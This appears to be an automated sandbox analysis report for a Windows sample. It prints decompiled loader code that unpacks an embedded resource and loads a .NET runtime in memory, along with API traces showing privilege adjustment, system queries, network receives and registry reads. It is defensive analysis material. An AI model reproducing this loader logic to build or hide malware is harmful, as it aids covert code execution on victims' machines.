                                                                                                              				_a8 = 0x95;
                                                                                                              				_a9 = 0x21;
                                                                                                              				_a10 = 0x2a;
                                                                                                              				_a11 = 0x57;
                                                                                                              				_a12 = 0xda;
                                                                                                              				_a13 = 0xc;
                                                                                                              				_a14 = 0x55;
                                                                                                              				_a15 = 0x25;
                                                                                                              				_a16 = 0x8c;
                                                                                                              				_a17 = 0xf9;
                                                                                                              				_a18 = 0x35;
                                                                                                              				_a19 = 0x97;
                                                                                                              				_a20 = 0xd0;
                                                                                                              				_a21 = 0x87;
                                                                                                              				_a22 = 0x7b;
                                                                                                              				_a23 = 0xf;
                                                                                                              				_a24 = 0xf4;
                                                                                                              				_a25 = 0x76;
                                                                                                              				_a26 = 0xb9;
                                                                                                              				_a27 = 0x34;
                                                                                                              				_a28 = 0xbf;
                                                                                                              				_a29 = 0x1e;
                                                                                                              				_a30 = 0xe7;
                                                                                                              				_a31 = 0x78;
                                                                                                              				_a32 = 0x98;
                                                                                                              				_a33 = 0xe9;
                                                                                                              				_a34 = 0x6f;
                                                                                                              				_a35 = 0xb4;
                                                                                                              				_a36 = 0;
                                                                                                              				_t178 = E00401650( &_a4,  &_a220);
                                                                                                              				_t331 = _t327 + 0x3c;
                                                                                                              				 *0x423480 = GetProcAddress(_t177, _t178);
                                                                                                              				_t309 = 0;
                                                                                                              				_a112 = 0;
                                                                                                              				_a56 = 0;
                                                                                                              				_a52 = 0;
                                                                                                              				_a43 = 0;
                                                                                                              				_a348 =  &_a352;
                                                                                                              				_t181 = E004018D0( &_a352,  &_a348,  &_a4, _t312, 3);
                                                                                                              				_push( &_a104);
                                                                                                              				_push(0x41b230);
                                                                                                              				_push(0x41b220);
                                                                                                              				_push(0);
                                                                                                              				_push(L"wks");
                                                                                                              				_push(L"v2.0.50727"); // executed
                                                                                                              				L0040AD3E(); // executed
                                                                                                              				if(_t181 < 0) {
                                                                                                              					_t309 = 0;
                                                                                                              					__eflags = 0;
                                                                                                              					goto L16;
                                                                                                              				} else {
                                                                                                              					_t231 = _a88;
                                                                                                              					_t233 =  *((intOrPtr*)( *((intOrPtr*)( *_t231 + 0x28))))(_t231); // executed
                                                                                                              					if(_t233 < 0) {
                                                                                                              						L16:
                                                                                                              						_a19 = 1;
                                                                                                              						L17:
                                                                                                              						_t182 = _a324;
                                                                                                              						_t345 = _t182 -  &_a328;
                                                                                                              						if(_t182 !=  &_a328) {
                                                                                                              							_push(_t182);
                                                                                                              							E0040B675(_t249, _t309, _t312, _t345);
                                                                                                              							_t331 = _t331 + 4;
                                                                                                              						}
                                                                                                              						if(_a19 == 0) {
                                                                                                              							_a20 = _t309;
                                                                                                              							E00401870( &_a36, _t320, "_._");
                                                                                                              							_t314 = __imp__#8;
                                                                                                              							_a20 = _t309;
                                                                                                              							 *_t314( &_a96);
                                                                                                              							E00401870( &_a84, _t320, "___");
                                                                                                              							_t192 =  *_t314( &_a104);
                                                                                                              							_t251 = _t249 + 0xfffffff2;
                                                                                                              							_a28 = _t249 + 0xfffffff2;
                                                                                                              							_a32 = _t309;
                                                                                                              							__imp__#15(0x11, 1,  &_a28); // executed
                                                                                                              							_t315 = _t192;
                                                                                                              							_a12 = _t309;
                                                                                                              							__imp__#23(_t315,  &_a12);
                                                                                                              							E0040B310(_t249 + 0xfffffff2, _t309, _t315, _a4, _t320, _t251);
                                                                                                              							_t333 = _t331 + 0xc;
                                                                                                              							__imp__#24(_t315);
                                                                                                              							_t195 = _v12;
                                                                                                              							if(_t195 == _t309) {
                                                                                                              								_t195 = E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t252 = _t195;
                                                                                                              							_t196 = _v12;
                                                                                                              							if(_t196 != _t309) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t196 + 8))))(_t196);
                                                                                                              							}
                                                                                                              							_v12 = _t309;
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t252 + 0xb4))))(_t252, _t315,  &_v12); // executed
                                                                                                              							if(_t315 != _t309) {
                                                                                                              								__imp__#16(_t315);
                                                                                                              							}
                                                                                                              							_t316 = _v24;
                                                                                                              							if(_t316 == _t309) {
                                                                                                              								E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t199 = _v20;
                                                                                                              							if(_t199 != _t309) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t199 + 8))))(_t199);
                                                                                                              							}
                                                                                                              							_t200 = _v8;
                                                                                                              							_v20 = _t309;
                                                                                                              							if(_t200 == _t309) {
                                                                                                              								_t201 = 0;
                                                                                                              								__eflags = 0;
                                                                                                              							} else {
                                                                                                              								_t201 =  *_t200;
                                                                                                              							}
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t316 + 0x44))))(_t316, _t201,  &_v20); // executed
                                                                                                              							__imp__#411(0xc, _t309, _t309);
                                                                                                              							_t273 = _v44;
                                                                                                              							if(_t273 == _t309) {
                                                                                                              								E0040AD50(0x80004003);
                                                                                                              							}
                                                                                                              							_t317 = _a24;
                                                                                                              							if(_t317 == _t309) {
                                                                                                              								_t296 = 0;
                                                                                                              								__eflags = 0;
                                                                                                              							} else {
                                                                                                              								_t296 =  *_t317;
                                                                                                              							}
                                                                                                              							_t331 = _t333 - 0x10;
                                                                                                              							_t205 = _t331;
                                                                                                              							 *_t205 = _a32;
                                                                                                              							 *((intOrPtr*)(_t205 + 4)) = _a36;
                                                                                                              							 *((intOrPtr*)(_t205 + 8)) = _a40;
                                                                                                              							 *((intOrPtr*)(_t205 + 0xc)) = _a44;
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t273 + 0xe4))))(_t273, _t296, 0x118, _t309, _t309,  &_a48);
                                                                                                              							_t254 = __imp__#9; // 0x76e3cf00
                                                                                                              							 *_t254( &_a8);
                                                                                                              							if(_t317 != _t309 && InterlockedDecrement(_t317 + 8) == 0) {
                                                                                                              								_t222 =  *_t317;
                                                                                                              								if(_t222 != _t309) {
                                                                                                              									__imp__#6(_t222);
                                                                                                              								}
                                                                                                              								_t223 =  *((intOrPtr*)(_t317 + 4));
                                                                                                              								_t358 = _t223 - _t309;
                                                                                                              								if(_t223 != _t309) {
                                                                                                              									_push(_t223);
                                                                                                              									E0040AF8B(_t254, _t309, _t317, _t358);
                                                                                                              									_t331 = _t331 + 4;
                                                                                                              								}
                                                                                                              								E0040AE80(_t254, _t309, _t317, _t358, _t317);
                                                                                                              								_t331 = _t331 + 4;
                                                                                                              							}
                                                                                                              							 *_t254( &_v12);
                                                                                                              							_t209 = _v92;
                                                                                                              							if(_t209 != _t309) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t209 + 8))))(_t209);
                                                                                                              							}
                                                                                                              							_t318 = _v80;
                                                                                                              							if(_t318 != _t309 && InterlockedDecrement(_t318 + 8) == 0) {
                                                                                                              								_t214 =  *_t318;
                                                                                                              								if(_t214 != _t309) {
                                                                                                              									__imp__#6(_t214);
                                                                                                              								}
                                                                                                              								_t215 =  *((intOrPtr*)(_t318 + 4));
                                                                                                              								_t363 = _t215 - _t309;
                                                                                                              								if(_t215 != _t309) {
                                                                                                              									_push(_t215);
                                                                                                              									E0040AF8B(_t254, _t309, _t318, _t363);
                                                                                                              									_t331 = _t331 + 4;
                                                                                                              								}
                                                                                                              								E0040AE80(_t254, _t309, _t318, _t363, _t318);
                                                                                                              								_t331 = _t331 + 4;
                                                                                                              							}
                                                                                                              							_t210 = _v96;
                                                                                                              							if(_t210 != _t309) {
                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t210 + 8))))(_t210);
                                                                                                              							}
                                                                                                              						}
                                                                                                              						_t183 = _a28;
                                                                                                              						if(_t183 != _t309) {
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t183 + 8))))(_t183);
                                                                                                              						}
                                                                                                              						_t184 = _a32;
                                                                                                              						if(_t184 != _t309) {
                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 8))))(_t184);
                                                                                                              						}
                                                                                                              						return 0;
                                                                                                              					}
                                                                                                              					_t234 = _a28;
                                                                                                              					if(_t234 != 0) {
                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t234 + 8))))(_t234);
                                                                                                              					}
                                                                                                              					_t235 = _a84;
                                                                                                              					_a28 = _t309;
                                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 0x34))))(_t235,  &_a28); // executed
                                                                                                              					_t312 = _a20;
                                                                                                              					if(_t312 == _t309) {
                                                                                                              						E0040AD50(0x80004003);
                                                                                                              					}
                                                                                                              					_t238 = _a16;
                                                                                                              					if(_t238 != _t309) {
                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t238 + 8))))(_t238);
                                                                                                              					}
                                                                                                              					_a16 = _t309;
                                                                                                              					 *((intOrPtr*)( *((intOrPtr*)( *_t312))))(_t312, 0x41b270,  &_a16);
                                                                                                              					goto L17;
                                                                                                              				}
                                                                                                              			}
                                                                                                              0x004022b7
                                                                                                              0x004022bd
                                                                                                              0x004022c4
                                                                                                              0x004022c4
                                                                                                              0x004022c9
                                                                                                              0x004022cf
                                                                                                              0x004022d7
                                                                                                              0x004022d7
                                                                                                              0x004022d9
                                                                                                              0x004022dd
                                                                                                              0x004022e3
                                                                                                              0x004022e9
                                                                                                              0x004022e9
                                                                                                              0x004022e5
                                                                                                              0x004022e5
                                                                                                              0x004022e5
                                                                                                              0x004022f7
                                                                                                              0x004022fd
                                                                                                              0x00402303
                                                                                                              0x00402309
                                                                                                              0x00402310
                                                                                                              0x00402310
                                                                                                              0x00402315
                                                                                                              0x0040231e
                                                                                                              0x00402324
                                                                                                              0x00402324
                                                                                                              0x00402320
                                                                                                              0x00402320
                                                                                                              0x00402320
                                                                                                              0x00402338
                                                                                                              0x0040233b
                                                                                                              0x0040233d
                                                                                                              0x00402347
                                                                                                              0x00402356
                                                                                                              0x00402368
                                                                                                              0x0040236b
                                                                                                              0x0040236d
                                                                                                              0x0040237b
                                                                                                              0x00402385
                                                                                                              0x00402391
                                                                                                              0x00402395
                                                                                                              0x00402398
                                                                                                              0x00402398
                                                                                                              0x0040239e
                                                                                                              0x004023a1
                                                                                                              0x004023a3
                                                                                                              0x004023a5
                                                                                                              0x004023a6
                                                                                                              0x004023ab
                                                                                                              0x004023ab
                                                                                                              0x004023af
                                                                                                              0x004023b4
                                                                                                              0x004023b4
                                                                                                              0x004023bf
                                                                                                              0x004023c1
                                                                                                              0x004023c7
                                                                                                              0x004023cf
                                                                                                              0x004023cf
                                                                                                              0x004023d1
                                                                                                              0x004023d7
                                                                                                              0x004023e3
                                                                                                              0x004023e7
                                                                                                              0x004023ea
                                                                                                              0x004023ea
                                                                                                              0x004023f0
                                                                                                              0x004023f3
                                                                                                              0x004023f5
                                                                                                              0x004023f7
                                                                                                              0x004023f8
                                                                                                              0x004023fd
                                                                                                              0x004023fd
                                                                                                              0x00402401
                                                                                                              0x00402406
                                                                                                              0x00402406
                                                                                                              0x00402409
                                                                                                              0x0040240f
                                                                                                              0x00402417
                                                                                                              0x00402417
                                                                                                              0x0040240f
                                                                                                              0x00402419
                                                                                                              0x0040241f
                                                                                                              0x00402427
                                                                                                              0x00402427
                                                                                                              0x00402429
                                                                                                              0x0040242f
                                                                                                              0x00402437
                                                                                                              0x00402437
                                                                                                              0x00402445
                                                                                                              0x00402445
                                                                                                              0x00402165
                                                                                                              0x0040216b
                                                                                                              0x00402173
                                                                                                              0x00402173
                                                                                                              0x00402175
                                                                                                              0x0040217d
                                                                                                              0x00402188
                                                                                                              0x0040218a
                                                                                                              0x00402190
                                                                                                              0x00402197
                                                                                                              0x00402197
                                                                                                              0x0040219c
                                                                                                              0x004021a2
                                                                                                              0x004021aa
                                                                                                              0x004021aa
                                                                                                              0x004021b1
                                                                                                              0x004021bf
                                                                                                              0x00000000
                                                                                                              0x004021bf

                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 00401F23
                                                                                                              • FreeResource.KERNEL32(00000000), ref: 00401F2C
                                                                                                              • _malloc.LIBCMT ref: 00401F3C
                                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F4C
                                                                                                              • _memset.LIBCMT ref: 00401F6D
                                                                                                              • LoadLibraryA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,?,00000004,00000000), ref: 00402030
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004020F4
                                                                                                              • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,0041B220,0041B230,?), ref: 0040214C
                                                                                                              • VariantInit.OLEAUT32(?), ref: 00402214
                                                                                                              • VariantInit.OLEAUT32(?), ref: 0040222F
                                                                                                              • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00402245
                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00402257
                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0040226D
                                                                                                              • SafeArrayDestroy.OLEAUT32(00000000), ref: 004022B1
                                                                                                              • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000000), ref: 004022FD
                                                                                                              • VariantClear.OLEAUT32(?,00000000,00000118,00000000,?,?,00000000,?,?,00000000,00000003), ref: 0040236B
                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040237B
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040238B
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402398
                                                                                                              • VariantClear.OLEAUT32(?), ref: 004023BF
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004023DD
                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 004023EA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: ArraySafeVariant$ClearFree$CreateDataDecrementInitInterlockedResourceString_memset$AccessAddressBindDestroyLibraryLoadProcRuntimeSizeofUnaccessVector_malloc
                                                                                                              • String ID: !$!$%$'$)$*$.$4$4$5$6$U$V$W$W$[$_._$___$o$o$v$v$v2.0.50727$wks$x$x${${
                                                                                                              • API String ID: 4264092172-2951066977
                                                                                                              • Opcode ID: f13bed0cada5c3f69348e6b50867a99a8d74d1a7d73b0fb04c476024b8476627
                                                                                                              • Instruction ID: 69e172c51e94bc9910b865bcfc731b54dfdcc32c1388aee113f6f9db1539967c
                                                                                                              • Opcode Fuzzy Hash: f13bed0cada5c3f69348e6b50867a99a8d74d1a7d73b0fb04c476024b8476627
                                                                                                              • Instruction Fuzzy Hash: 3C028B701083809EC321DB68C888A5FBBE5AFD6304F444A5DF5D99B2E2D779D805CB6B
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 026BAA23
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: AdjustPrivilegesToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 2874748243-0
                                                                                                              • Opcode ID: aef9d08f7a3d6158660b7f19b508dfca3c4d8f80cf8589561b76d34b9ccb3920
                                                                                                              • Instruction ID: 59d140eb728bb19a8252c3637776a3ee6fa340831a389f4c3484fb1531bbbb60
                                                                                                              • Opcode Fuzzy Hash: aef9d08f7a3d6158660b7f19b508dfca3c4d8f80cf8589561b76d34b9ccb3920
                                                                                                              • Instruction Fuzzy Hash: 0021A1765097809FDB238F25DC44B92BFB4EF06210F0984DAE9858F663D371D948CB62
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 026BAA23
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: AdjustPrivilegesToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 2874748243-0
                                                                                                              • Opcode ID: e991542edace0fb69bde6cd58c0a2e21ff2c9ea550540e07b765c3ff8093f681
                                                                                                              • Instruction ID: f1570900efcec909a0c1cc258f0b2feb388e0d460bb04a14bafce5a441a6263e
                                                                                                              • Opcode Fuzzy Hash: e991542edace0fb69bde6cd58c0a2e21ff2c9ea550540e07b765c3ff8093f681
                                                                                                              • Instruction Fuzzy Hash: 601170715003009FDB21CF99D944BA6FBE4EF05220F08846AED498B655E375E858CF71
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 026BB9F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: InformationQuerySystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 3562636166-0
                                                                                                              • Opcode ID: 10fdd44d23f676fa57cd79f1768df4cd4f1bf21d9c8c979d506f90000e509b62
                                                                                                              • Instruction ID: a45aa6351d350563146731dd2d0c4d72381cea5b5e0799c4586bcb28596c939f
                                                                                                              • Opcode Fuzzy Hash: 10fdd44d23f676fa57cd79f1768df4cd4f1bf21d9c8c979d506f90000e509b62
                                                                                                              • Instruction Fuzzy Hash: 85019A72400344AFEB218F06DD84B62FFA8EF49724F08C45DEE894B211D371A858CB61
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: recv
                                                                                                              • String ID:
                                                                                                              • API String ID: 1507349165-0
                                                                                                              • Opcode ID: ce784629a4417805041fd37d625989b8fb0123d022037eec10991cc18ac478a8
                                                                                                              • Instruction ID: e4d0f58ed63548e57884c04301bd4b2a4eae3d5045e211de105604b8103aec77
                                                                                                              • Opcode Fuzzy Hash: ce784629a4417805041fd37d625989b8fb0123d022037eec10991cc18ac478a8
                                                                                                              • Instruction Fuzzy Hash: 64015E715043409FDB61CF5AD984B65FFA0EF04324F0884AADD494B655D375E458CB72
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 026BB9F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: InformationQuerySystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 3562636166-0
                                                                                                              • Opcode ID: a7c4b6fa9532e4815cbb85cb31c3047e00eedc8500cd64ea375a66497c74c5e6
                                                                                                              • Instruction ID: 50c7a677dd726e6017427df6b292867df0a00e59c4a73d16df1a97cd32d8a874
                                                                                                              • Opcode Fuzzy Hash: a7c4b6fa9532e4815cbb85cb31c3047e00eedc8500cd64ea375a66497c74c5e6
                                                                                                              • Instruction Fuzzy Hash: 29018B319003409FDB618F4AD884B61FFA0EF09324F08C49ADD494B616D375E458CB72
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 84%
                                                                                                              			E004018D0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
                                                                                                              				void* __ebx;
                                                                                                              				void* __ebp;
                                                                                                              				signed int _t12;
                                                                                                              				void* _t21;
                                                                                                              				int _t25;
                                                                                                              				void* _t30;
                                                                                                              				int _t32;
                                                                                                              				char* _t35;
                                                                                                              
                                                                                                              				_t21 = __edx;
                                                                                                              				_t35 = _a4;
                                                                                                              				_t17 = __ecx;
                                                                                                              				if(_t35 != 0) {
                                                                                                              					_t25 = lstrlenA(_t35) + 1;
                                                                                                              					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
                                                                                                              					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
                                                                                                              					asm("sbb esi, esi");
                                                                                                              					_t30 =  ~_t12 + 1;
                                                                                                              					if(_t30 != 0) {
                                                                                                              						_t12 = GetLastError();
                                                                                                              						if(_t12 == 0x7a) {
                                                                                                              							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
                                                                                                              							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
                                                                                                              							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
                                                                                                              							asm("sbb esi, esi");
                                                                                                              							_t30 =  ~_t12 + 1;
                                                                                                              						}
                                                                                                              						if(_t30 != 0) {
                                                                                                              							_t12 = E00401030();
                                                                                                              						}
                                                                                                              					}
                                                                                                              					return _t12;
                                                                                                              				} else {
                                                                                                              					 *__ecx = _t35;
                                                                                                              					return __eax;
                                                                                                              				}
                                                                                                              			}












                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(?), ref: 004018E6
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040190F
                                                                                                              • GetLastError.KERNEL32 ref: 00401920
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401938
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401960
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3322701435-0
                                                                                                              • Opcode ID: 8573e2c317d3cfbbe08dd234adf7fb2bf028b8f5a35bd758f9ba00c18020373e
                                                                                                              • Instruction ID: 479df52544d56d876bc77731e3856ebb8807a2cfa2341b2feafe69ca537890df
                                                                                                              • Opcode Fuzzy Hash: 8573e2c317d3cfbbe08dd234adf7fb2bf028b8f5a35bd758f9ba00c18020373e
                                                                                                              • Instruction Fuzzy Hash: 4C11B2766402247BD230A7558C88F677F6CEF86BA9F008169FD85AB291C635AC04C6B8
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 63%
                                                                                                              			E0040AF26(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                              				signed int _v4;
                                                                                                              				signed int _v16;
                                                                                                              				signed int _v40;
                                                                                                              				void* _t14;
                                                                                                              				signed int _t15;
                                                                                                              				intOrPtr* _t21;
                                                                                                              				signed int _t24;
                                                                                                              				void* _t28;
                                                                                                              				void* _t39;
                                                                                                              				void* _t40;
                                                                                                              				signed int _t42;
                                                                                                              				void* _t45;
                                                                                                              				void* _t47;
                                                                                                              				void* _t51;
                                                                                                              
                                                                                                              				_t40 = __edi;
                                                                                                              				_t28 = __ebx;
                                                                                                              				_t45 = _t51;
                                                                                                              				while(1) {
                                                                                                              					_t14 = E0040B80D(_t28, _t39, _t40, _a4); // executed
                                                                                                              					if(_t14 != 0) {
                                                                                                              						break;
                                                                                                              					}
                                                                                                              					_t15 = E0040D2A3(_a4);
                                                                                                              					__eflags = _t15;
                                                                                                              					if(_t15 == 0) {
                                                                                                              						__eflags =  *0x423490 & 0x00000001;
                                                                                                              						if(( *0x423490 & 0x00000001) == 0) {
                                                                                                              							 *0x423490 =  *0x423490 | 0x00000001;
                                                                                                              							__eflags =  *0x423490;
                                                                                                              							E0040AEBC(0x423484);
                                                                                                              							E0040D27D( *0x423490, 0x41a6c4);
                                                                                                              						}
                                                                                                              						E0040AF09( &_v16, 0x423484);
                                                                                                              						E0040CCF9( &_v16, 0x420fa4);
                                                                                                              						asm("int3");
                                                                                                              						_t47 = _t45;
                                                                                                              						_push(_t47);
                                                                                                              						_push(0xc);
                                                                                                              						_push(0x420ff8);
                                                                                                              						_t19 = E0040E198(_t28, _t40, 0x423484);
                                                                                                              						_t42 = _v4;
                                                                                                              						__eflags = _t42;
                                                                                                              						if(_t42 != 0) {
                                                                                                              							__eflags =  *0x4250b0 - 3;
                                                                                                              							if( *0x4250b0 != 3) {
                                                                                                              								_push(_t42);
                                                                                                              								goto L16;
                                                                                                              							} else {
                                                                                                              								E0040D6A0(_t28, 4);
                                                                                                              								_v16 = _v16 & 0x00000000;
                                                                                                              								_t24 = E0040D6D3(_t42);
                                                                                                              								_v40 = _t24;
                                                                                                              								__eflags = _t24;
                                                                                                              								if(_t24 != 0) {
                                                                                                              									_push(_t42);
                                                                                                              									_push(_t24);
                                                                                                              									E0040D703();
                                                                                                              								}
                                                                                                              								_v16 = 0xfffffffe;
                                                                                                              								_t19 = E0040B6CB();
                                                                                                              								__eflags = _v40;
                                                                                                              								if(_v40 == 0) {
                                                                                                              									_push(_v4);
                                                                                                              									L16:
                                                                                                              									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                                                              									if(__eflags == 0) {
                                                                                                              										_t21 = E0040BF81(__eflags);
                                                                                                              										 *_t21 = E0040BF3F(GetLastError());
                                                                                                              									}
                                                                                                              								}
                                                                                                              							}
                                                                                                              						}
                                                                                                              						return E0040E1DD(_t19);
                                                                                                              					} else {
                                                                                                              						continue;
                                                                                                              					}
                                                                                                              					L19:
                                                                                                              				}
                                                                                                              				return _t14;
                                                                                                              				goto L19;
                                                                                                              			}


















                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 0040AF40
                                                                                                                • Part of subcall function 0040B80D: __FF_MSGBANNER.LIBCMT ref: 0040B830
                                                                                                                • Part of subcall function 0040B80D: __NMSG_WRITE.LIBCMT ref: 0040B837
                                                                                                                • Part of subcall function 0040B80D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C46,00000001,00000001,00000001,?,0040D62A,00000018,00421240,0000000C,0040D6BB), ref: 0040B884
                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AF63
                                                                                                                • Part of subcall function 0040AEBC: std::exception::exception.LIBCMT ref: 0040AEC8
                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AF77
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040AF85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                              • String ID:
                                                                                                              • API String ID: 1411284514-0
                                                                                                              • Opcode ID: d30f8c44cb69d90f3fd87a0b0606e938fd9b4af3ccd9ae8c023a4b02cbe9f77d
                                                                                                              • Instruction ID: d0037a69dd8aa8fc1f7bd44e20a83df3c9345600b6565f77841dd3ec14470a5b
                                                                                                              • Opcode Fuzzy Hash: d30f8c44cb69d90f3fd87a0b0606e938fd9b4af3ccd9ae8c023a4b02cbe9f77d
                                                                                                              • Instruction Fuzzy Hash: CCF0E271A0430662CB14BB61EC0BD4A3B688F4031CB6000BFEC11750E2DF7CDA16959E
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E38), ref: 026BB6CD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: e8610c4fce2ced8f2d3f62f5e79d0c9ca901a3c3e540a8d785764b1c3fa12620
                                                                                                              • Instruction ID: 151474e03dae871a0149539ab5bb27564e569636dadbc90574bd822af0a5ac30
                                                                                                              • Opcode Fuzzy Hash: e8610c4fce2ced8f2d3f62f5e79d0c9ca901a3c3e540a8d785764b1c3fa12620
                                                                                                              • Instruction Fuzzy Hash: 043194B25097846FE7238B25CC45FA6BFB8EF06724F0884DBE9809B153D264E949C771
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              APIs
                                                                                                              • RegQueryValueExW.KERNEL32(?,00000E38,EECC1F65,00000000,00000000,00000000,00000000), ref: 026BB7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912478907.00000000026BA000.00000040.00000001.sdmp, Offset: 026BA000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3660427363-0
                                                                                                              • Opcode ID: f52aa5605e76d317bae4f7e291c2622372d631da73ee4890400f2c4e04c920ca
                                                                                                              • Instruction ID: ae19ae447b5acdefdab6eacdaef97914ad1866e995d948d7bd52845a4d6782c8
                                                                                                              • Opcode Fuzzy Hash: f52aa5605e76d317bae4f7e291c2622372d631da73ee4890400f2c4e04c920ca
                                                                                                              • Instruction Fuzzy Hash: 7A3191711097846FE722CF25CC84F92BFF8EF06324F1884AAE9858B253D364E549CB61
                                                                                                              Uniqueness

